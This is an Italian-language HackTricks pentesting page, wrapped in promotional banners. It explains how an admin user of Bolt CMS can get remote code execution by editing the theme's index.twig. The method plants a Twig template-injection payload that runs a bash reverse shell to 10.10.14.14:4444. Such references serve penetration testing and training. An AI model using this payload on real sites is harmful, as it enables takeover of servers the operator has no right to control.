Bolt CMS

Tip

Impara e pratica il hacking AWS:HackTricks Training AWS Red Team Expert (ARTE)
Impara e pratica il hacking GCP: HackTricks Training GCP Red Team Expert (GRTE) Impara e pratica il hacking Azure: HackTricks Training Azure Red Team Expert (AzRTE)

Supporta HackTricks

• Controlla i piani di abbonamento!
• Unisciti al 💬 gruppo Discord o al gruppo telegram o seguici su Twitter 🐦 @hacktricks_live.
• Condividi trucchi di hacking inviando PR ai HackTricks e HackTricks Cloud repos github.

RCE

Dopo aver effettuato il login come admin (vai su /bot per accedere al prompt di login), puoi ottenere RCE in Bolt CMS:

• Seleziona Configuration -> View Configuration -> Main Configuration oppure vai al percorso URL /bolt/file-edit/config?file=/bolt/config.yaml
• Controlla il valore del tema

• Seleziona File management -> View & edit templates
• Seleziona il tema base trovato nel passo precedente (base-2021 in questo caso) e seleziona index.twig
• Nel mio caso questo si trova nel percorso URL /bolt/file-edit/themes?file=/base-2021/index.twig
• Imposta il tuo payload in questo file tramite template injection (Twig), come: {{['bash -c "bash -i >& /dev/tcp/10.10.14.14/4444 0>&1"']|filter('system')}}
• E salva le modifiche

• Pulisci la cache in Maintenance -> Clear the cache
• Accedi di nuovo alla pagina come utente normale, e il payload dovrebbe essere eseguito

Tip

Impara e pratica il hacking AWS:HackTricks Training AWS Red Team Expert (ARTE)
Impara e pratica il hacking GCP: HackTricks Training GCP Red Team Expert (GRTE) Impara e pratica il hacking Azure: HackTricks Training Azure Red Team Expert (AzRTE)

Supporta HackTricks

• Controlla i piani di abbonamento!
• Unisciti al 💬 gruppo Discord o al gruppo telegram o seguici su Twitter 🐦 @hacktricks_live.
• Condividi trucchi di hacking inviando PR ai HackTricks e HackTricks Cloud repos github.